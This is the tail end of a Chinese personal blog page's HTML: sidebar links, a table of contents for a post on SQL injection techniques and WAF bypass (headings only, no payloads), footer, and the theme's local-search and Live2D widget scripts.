                    <a href="https://www.yuque.com/p1kchu/kixb8w" target="_blank" title="P1hery">
                      
                        <i class="fa fa-fw fa-globe"></i>P1hery</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://shutup-sg.github.io/" target="_blank" title="shutup">
                      
                        <i class="fa fa-fw fa-globe"></i>shutup</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://00end.github.io/" target="_blank" title="00end">
                      
                        <i class="fa fa-fw fa-globe"></i>00end</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#sql%E6%B3%A8%E5%85%A5%E5%AD%A6%E4%B9%A0"><span class="nav-text">sql注入学习</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%B3%A8%E5%85%A5%E6%96%B9%E5%BC%8F%E5%8F%8A%E5%8E%9F%E7%90%86"><span class="nav-text">注入方式及原理</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="nav-text">报错注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%BB%B6%E6%97%B6%E7%9B%B2%E6%B3%A8"><span class="nav-text">延时盲注</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#boolen%E7%9B%B2%E6%B3%A8"><span class="nav-text">boolen盲注</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#dnslog%E6%B3%A8%E5%85%A5"><span class="nav-text">dnslog注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BA%8C%E6%AC%A1%E6%B3%A8%E5%85%A5"><span class="nav-text">二次注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A0%86%E5%8F%A0%E6%9F%A5%E8%AF%A2"><span class="nav-text">堆叠查询</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5"><span class="nav-text">宽字节注入</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9F%A5%E8%AF%A2%E6%96%B9%E5%BC%8F%E6%B3%A8%E5%85%A5"><span class="nav-text">查询方式注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%95%B0%E6%8D%AE%E5%BA%93%E7%B1%BB%E5%9E%8B%E5%88%86%E7%B1%BB"><span class="nav-text">数据库类型分类</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#mysql%E6%B3%A8%E5%85%A5"><span class="nav-text">mysql注入</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#%E4%B8%80%E4%BA%9B%E7%89%B9%E6%80%A7%E5%87%BD%E6%95%B0"><span class="nav-text">一些特性函数</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#mysql%E7%9A%84%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E5%87%BD%E6%95%B0"><span class="nav-text">mysql的读取文件函数</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#oracle%E6%B3%A8%E5%85%A5"><span class="nav-text">oracle注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#mongodb%E6%B3%A8%E5%85%A5"><span class="nav-text">mongodb注入</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#WAF%E7%BB%95%E8%BF%87"><span class="nav-text">WAF绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E7%BB%95%E8%BF%87"><span class="nav-text">常见绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#%E6%B3%A8%E9%87%8A%E7%AC%A6%E7%BB%95%E8%BF%87"><span class="nav-text">注释符绕过</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#%E5%86%85%E8%81%94%E6%B3%A8%E9%87%8A%E7%BB%95%E8%BF%87"><span class="nav-text">内联注释绕过</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#%E5%A4%A7%E5%B0%8F%E5%86%99%E7%BB%95%E8%BF%87"><span class="nav-text">大小写绕过</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#%E5%8F%8C%E5%86%99%E7%BB%95%E8%BF%87"><span class="nav-text">双写绕过</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#%E5%85%B3%E9%94%AE%E5%AD%97%E6%9B%BF%E6%8D%A2"><span class="nav-text">关键字替换</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E9%80%97%E5%8F%B7%E8%A2%AB%E8%BF%87%E6%BB%A4"><span class="nav-text">绕过逗号被过滤</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#%E6%AF%94%E8%BE%83%E7%AC%A6%E5%8F%B7%E8%A2%AB%E8%BF%87%E6%BB%A4"><span class="nav-text">比较符号被过滤</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#%E9%80%BB%E8%BE%91%E7%AC%A6%E5%8F%B7%E7%BB%95%E8%BF%87"><span class="nav-text">逻辑符号绕过</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#%E6%9B%B4%E6%94%B9%E6%8F%90%E4%BA%A4%E6%96%B9%E5%BC%8F"><span class="nav-text">更改提交方式</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#%E7%A9%BA%E6%A0%BC%E7%BB%95%E8%BF%87"><span class="nav-text">空格绕过</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#%E7%AD%89%E4%BB%B7%E5%87%BD%E6%95%B0%E7%BB%95%E8%BF%87"><span class="nav-text">等价函数绕过</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#http%E5%8F%82%E6%95%B0%E6%B1%A1%E6%9F%93"><span class="nav-text">http参数污染</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E7%BB%95%E8%BF%87"><span class="nav-text">缓冲区溢出绕过</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#%E4%B8%80%E4%BA%9B%E5%87%BD%E6%95%B0%E7%9A%84%E7%BB%95%E8%BF%87"><span class="nav-text">一些函数的绕过</span></a></li></ol></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%85%B3%E4%BA%8Esql%E6%B3%A8%E5%85%A5%E7%9A%84%E9%9D%A2%E8%AF%95%E9%A2%98"><span class="nav-text">关于sql注入的面试题</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#sqlmap%E7%9A%84%E4%BD%BF%E7%94%A8"><span class="nav-text">sqlmap的使用</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">HoAd</span>

  
</div>

<!--



-->

<div>
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<span id="busuanzi_container_site_pv" style='display:none'>
    本站总访问量 <span id="busuanzi_value_site_pv"></span> 次
</span>
</div>



        







        
      </div>
    </footer>

    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"log":false,"model":{"jsonPath":"/live2dw/assets/shizuku.model.json"},"display":{"position":"left","width":150,"height":300},"mobile":{"show":true}});</script></body>
</html>
